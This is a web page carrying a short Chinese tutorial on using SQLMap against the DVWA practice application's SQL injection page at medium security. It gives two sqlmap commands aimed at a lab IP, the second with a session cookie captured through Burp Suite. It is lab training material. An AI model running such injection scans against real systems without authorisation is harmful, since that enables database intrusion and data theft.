千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

DVWA系列之4 利用SQLMap进行medium级别注入

发表于:2025-12-03 作者:千家信息网编辑
千家信息网最后更新 2025年12月03日,下面我们尝试利用SQLMap进行medium级别下的注入。首先探测是否存在注入点,执行下面的命令:sqlmap.py -u http://192.168.80.1/dvwa/vulnerabiliti
千家信息网最后更新 2025年12月03日DVWA系列之4 利用SQLMap进行medium级别注入

下面我们尝试利用SQLMap进行medium级别下的注入。

首先探测是否存在注入点,执行下面的命令:

sqlmap.py -u http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

检测结果没有发现注入点,这是由于DVWA需要先登录然后才能使用,因而这里需要得到当前会话的cookie,用来在***过程中维持连接状态。利用Burpsuite拦截数据包,获取cookie。

在SQLMap中加--cookie参数,继续进行注入。

sqlmap.py -u "http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=2f120ee00f32798d11de936832312549"

这下成功探测到注入点。

关于sqlmap和Burpsuite以后会另行发个系列博文。

很赞哦!
探测 级别 成功 参数 命令 数据 状态 结果 过程 这是 面的 中加 尝试 检测 登录 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 浪潮服务器能装xp系统么 党政机关网络安全自查表 真实项目数据库表设计 上海安永网络安全 mvc模式导入数据库 福建商业软件开发价格多少 严守网络安全班会ppt课件免费 龙岩市网络安全教育周 企帮网络技术公司怎么样 svn迁移到本地服务器 网页签名ios软件开发 简述满足层次数据库的条件 云服务器怎么加带宽 可视化软件开发预算详细 服务器数据迁移报告 小学网络安全各种制度 梦幻西游手游转区竞拍服务器 电信网络安全招标 服务器电脑主板怎么设置 应届研究生软件开发工资 网络关键建和网络安全 软件开发云南 游戏软件开发的经营范围 为什么要颁布网络安全法规 网络安全专题考试登陆 kawaks服务器 软件开发乙方 移动终端应用软件开发方向 常用的数据库安全技术 如何保护好家中的网络安全

相关文章

0